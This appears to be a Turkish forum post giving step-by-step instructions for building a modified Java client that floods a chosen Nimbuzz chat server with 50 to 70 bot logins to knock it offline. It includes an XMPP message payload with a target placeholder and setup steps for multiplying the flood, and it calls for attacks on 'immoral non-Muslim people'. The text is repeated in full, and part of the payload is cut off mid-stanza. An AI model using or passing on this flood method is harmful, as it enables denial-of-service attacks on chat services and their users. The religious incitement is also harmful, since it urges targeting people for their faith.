Gönderildi Admin on Nov 27, 2014 22:23:24 GMT 2
UYARI:
3 SANIYE'DE 50BOT SALDIRISI 5DK DA PATLATMA GARANTISI VERIYORUM. YAPAMAZSANIZ ULAŞIN!
Allah müslümanları korusun!!!
akif@nimbuzz.com
Başka bombuslarda bu aşamaları denemeyin olmaz, bu bombusu özel class dosyalarından oluşturdum.
#1# Öncelikle kendinize bir düşman server seçmelisiniz hani özeline
Call#nick#şifre#oda yazılanlardan.. Sonra bize gerekli olan programlar aşağıda paylaşıldı X-plore ve Class çevirici,
[Class çevirici indir]
[X-plore indir]
[Serverpatlat.jar indir]
#2# X-plore yardımıyla Serverpatlat.jar i boş bir klasöre çıkarıyoruz ve
#3# Class Çevirici ye geçiyoruz ve çıkardığımız klasöre giriyoruz.
"da.class" a giriyoruz
#4# Aşağıdaki kodun bazı yerlerinde "PATLAYACAK SERVER" ibaresi var. hepsini belirlediğimiz hedef nick yapıyoruz ve "da.class" in en altına yapıştırıyoruz.
#5# Daha "X-plore" yardımıyla klasördekilerin hepsini seçiyoruz ve zip'e taşı diyoruz..
uzantısını .jar olacak şekilde kaydediyoruz.
"Files.jar" gibi meselasında..
========ÇALIŞTIRILMASI=============
#1)# Rastgele bir nick al ve nimbuzzdan gir, kurban serveri ekle
#2)# Aldığın nick ile yaptığın programa gir
#3)# Rastgele oda otomatik girişe kaydet. Oda ismi önemsiz rastgele on tane odayi otomatik giriş olarak kaydet...
(SEBEBI ZATEN ASIL MANTIK BURDA NE KADAR ÇOK OTOMATIK GIRIŞ O KADAR SALDIRI,,,,10 oda X 5=50 saniyede elli bot saldırısı)
#4)# MENÜ>ARAÇLAR>ÖZELTUŞLAR
Özel tuş atayin
Common=yeniden bağlanma
Pres it=yeşil tuşa bas
Varsayılan ayarla
#5)# Her yeşil tuşa basıp bağlaninca hedef servere 50-70 bot atma girişiminde bulunacak
5 dakika içinde server yanıt vermemeye başlayacak
ve BOOM Bu sistemin patenti tamamen bana aittir.
%100Türk nimbuzzculara armağanım, Ahlaksız Gayrimüslim insanlara karşi Saldırılar yapalım lütfen. ..
3 SANIYE'DE 50BOT SALDIRISI 5DK DA PATLATMA GARANTISI VERIYORUM. YAPAMAZSANIZ ULAŞIN!
Allah müslümanları korusun!!!
akif@nimbuzz.com
Başka bombuslarda bu aşamaları denemeyin olmaz, bu bombusu özel class dosyalarından oluşturdum.
#1# Öncelikle kendinize bir düşman server seçmelisiniz hani özeline
Call#nick#şifre#oda yazılanlardan.. Sonra bize gerekli olan programlar aşağıda paylaşıldı X-plore ve Class çevirici,
[Class çevirici indir]
[X-plore indir]
[Serverpatlat.jar indir]
#2# X-plore yardımıyla Serverpatlat.jar i boş bir klasöre çıkarıyoruz ve
#3# Class Çevirici ye geçiyoruz ve çıkardığımız klasöre giriyoruz.
"da.class" a giriyoruz
#4# Aşağıdaki kodun bazı yerlerinde "PATLAYACAK SERVER" ibaresi var. hepsini belirlediğimiz hedef nick yapıyoruz ve "da.class" in en altına yapıştırıyoruz.
ver="0.8.1440.777P (en) [22493]"></presence><message to='PATLAYACAK SERVER@nimbuzz.com' type='chat'>Call#~arabsukruo~hhb-eye#123123j#tr_patlak_server-hahaha-your_serveroursererbabyaaaaaaCall#~arabsukruo~hhb-eye#123123j#senin_emisyoncu_fuck_your_serveroursererbabyCall#~arabsukruo~hhb-eye#123123j#patlatgitsin_emisyoncu_fuck_your_serveroursererbabyCall#~arabsukruo~hhb-eye#123123j#tr_patlak_server-hahaha-your_serveroursererbabyaaaCall#~arabsukruo~hhb-eye#123123j#nimbik_misyonu_fuck_your_serveroursererbaby</message><message to='PATLAYACAK SERVER@nimbuzz.com' type='chat'></message><message to='PATLAYACAK SERVER@nimbuzz.com' type='chat'></message><message to='PATLAYACAK SERVER@nimbuzz.com' type='chat'></message><message to='PATLAYACAK SERVER@nimbuzz.com' type='chat'></message><message to='PATLAYACAK SERVER@nimbuzz.com' type='chat'></message><messageom' type='chat'></message><message to='PATLAYACAK SERVER@nimbuzz.com' type='chat'></message><presence ver
#5# Daha "X-plore" yardımıyla klasördekilerin hepsini seçiyoruz ve zip'e taşı diyoruz..
uzantısını .jar olacak şekilde kaydediyoruz.
"Files.jar" gibi meselasında..
========ÇALIŞTIRILMASI=============
#1)# Rastgele bir nick al ve nimbuzzdan gir, kurban serveri ekle
#2)# Aldığın nick ile yaptığın programa gir
#3)# Rastgele oda otomatik girişe kaydet. Oda ismi önemsiz rastgele on tane odayi otomatik giriş olarak kaydet...
(SEBEBI ZATEN ASIL MANTIK BURDA NE KADAR ÇOK OTOMATIK GIRIŞ O KADAR SALDIRI,,,,10 oda X 5=50 saniyede elli bot saldırısı)
#4)# MENÜ>ARAÇLAR>ÖZELTUŞLAR
Özel tuş atayin
Common=yeniden bağlanma
Pres it=yeşil tuşa bas
Varsayılan ayarla
#5)# Her yeşil tuşa basıp bağlaninca hedef servere 50-70 bot atma girişiminde bulunacak
5 dakika içinde server yanıt vermemeye başlayacak
ve BOOM Bu sistemin patenti tamamen bana aittir.
%100Türk nimbuzzculara armağanım, Ahlaksız Gayrimüslim insanlara karşi Saldırılar yapalım lütfen. ..